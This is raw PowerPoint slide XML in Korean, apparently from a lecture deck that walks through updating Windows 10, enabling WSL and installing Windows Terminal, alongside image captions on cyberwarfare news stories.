        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9"/>
          <a:srcRect t="-489" r="1233" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477481" y="3741726"/>
            <a:ext cx="5249433" cy="753636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD2411D-A392-4F02-BCDA-8984C6AD3AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6337074" y="849726"/>
            <a:ext cx="5358429" cy="994978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="716877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/WindowUpdate</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>윈도우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>업데이트</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시작버튼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>톱니바퀴 아이콘 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="AppleSDGothicNeo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>업데이트 및 보안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="AppleSDGothicNeo"/>
              </a:rPr>
              <a:t>을 클릭한다</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최신버전이 아니라면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드 및 설치 버튼 클릭 및 업데이트 진행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Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>업데이트 버전의 다운로드가 완료되었다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>컴퓨터를 재부팅 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC33DA47-3D5F-4FB2-8DA5-CCA063373CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662782" y="2277402"/>
            <a:ext cx="1104900" cy="1590675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{376A7B9C-771E-46BB-9322-7E2B17CBF202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1457767" y="4491778"/>
            <a:ext cx="1867442" cy="1373517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD5AF3F-8AAB-4974-B796-94C591F00CCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9248782" y="2339437"/>
            <a:ext cx="1897199" cy="2072229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C386BA60-0043-4409-AF0F-D17FD6A554B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6913823" y="2339437"/>
            <a:ext cx="1535470" cy="1985288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="화살표: 오른쪽 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8360139-8F96-41DF-BCE7-7BC3F3190034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8787739" y="3277588"/>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628934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란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="화살표: 오른쪽 20">
            <a:hlinkClick r:id="rId2"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586E501C-0EC3-4EAE-A2E9-59C854E0D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258" y="1978939"/>
            <a:ext cx="5349876" cy="3211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38F3E-DA3A-4BA9-9352-E5748507BE3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482032" y="5478449"/>
            <a:ext cx="11154329"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Windows10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>운영체제에서 리눅스 운영체제의 쉘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>시스템을 사용할 수 있도록 지원해주는 기능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windwos10 2004 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>버전</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>을 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>Hyper-V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>를 사용하면서 다른 가상화 프로그램을 사용할 수 없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25817990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탐색기에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“store” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 검색한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Microsoft Strore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </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검색 버튼을 눌러서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>windows terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 검색하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설치</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0C0220-BD71-451C-9848-892FD7C1DAA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6626576" y="2223394"/>
            <a:ext cx="4855501" cy="779627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="직사각형 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA5E740C-31BC-4117-B0BF-7924CFA11452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10776856" y="2358914"/>
            <a:ext cx="302821" cy="154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2CED94EB-2409-45C2-AF1A-A23868AB9F82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="5012"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312223" y="2387986"/>
            <a:ext cx="3526844" cy="3068553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC6FE04F-909B-4CDC-8EF7-C924D7705391}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6628111" y="3114896"/>
            <a:ext cx="4855501" cy="955712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0601FCE5-9621-4F51-986F-442225166FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6626576" y="4191914"/>
            <a:ext cx="3087769" cy="1044673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="그림 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E64B85-DE89-4B4C-9B98-721759D8D6F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10157835" y="4184902"/>
            <a:ext cx="1324242" cy="1051685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="화살표: 오른쪽 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FEF55D-EC09-4303-BEBB-9A88B50D62E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9888517" y="4651367"/>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F5FEB210-CDB4-41A5-A367-ACBC559291D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="-1" r="201" b="26617"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6626576" y="5360141"/>
            <a:ext cx="3029488" cy="876067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="직사각형 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C17B329D-56E0-41F4-A848-155BA347B371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181378" y="5236587"/>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B15E4711-8FD7-4DB7-95DA-D2DB63ADE2B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312223" y="2775155"/>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404853C1-981E-4A37-B507-0DB64650E834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9591188" y="3429000"/>
            <a:ext cx="1234774" cy="273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328DC192-1FB9-417C-9706-8C2C1FF55BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8923061" y="4403149"/>
            <a:ext cx="733003"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hlinkClick r:id="rId8"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28123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다영역작전이란 육해공을 위주로 한 전통적 영역 이외의 사이버와 우주 그리고 전자기장 영역까지를 포함하는 새로운 미 육군의 교리이다. 사진=미 육군">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F775E46-94E2-4239-BD0C-1BDD22D84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43" y="2202637"/>
            <a:ext cx="3530827" cy="1980708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:ex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dirty="0"/>
              <a:t>사이버전</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>? </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76" name="Picture 8" descr="러시아 추정 해커, 美 재무부·통신정보청 이메일 들여다봤다&quot; - Chosunbiz &gt; 국제">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD7E7802-5DF6-4A74-A5AA-57EB6F5D9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1330" y="4613186"/>
            <a:ext cx="2862470" cy="18796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北의 사이버 공격 급증… '사이버戰 교전 수칙' 검토 - 조선일보">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A8C303F-1425-4181-BFEC-C74121BC06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331" y="4603002"/>
            <a:ext cx="2238640" cy="1175286"/>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4D0D3A23-F694-4ABF-A98F-6D52B549C83E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665015" y="6031899"/>
            <a:ext cx="3597605" cy="233887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7180" name="Picture 12" descr="씨네마 사이언스] “자, 선수 입장!” 영화 속 '해커'의 세계 - 이뉴스투데이">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7475B35-02B4-4DD9-986C-D6991181FF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7984" y="4603002"/>
            <a:ext cx="3323908" cy="18696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T 강국 맞나?...한국, 사이버테러 대비 '최약체'&quot;- 헤럴드경제">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDE6EA36-E106-49D8-8F47-0E9B862765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2620" y="1987271"/>
            <a:ext cx="4331741" cy="23191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637A179-139D-4332-9FC8-EC389ABB79B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508390" y="1820849"/>
            <a:ext cx="4085971" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>아시아태평양 국가보안 전망 보고서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>(2016 Deloitte Asia-Pacific Defense Outlook</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89D921E9-C7C7-4C09-8071-260B4256A31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588" r="47943"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8745711" y="1619512"/>
            <a:ext cx="2608089" cy="2768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87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설치를 완료하였다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 다시 컴퓨터 좌측 하단의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>돋보기에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 검색하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>관리자 권한으로 터미널을 실행</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윈도우 터미널에 아래 명령어를 순서대로 입력해주세요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
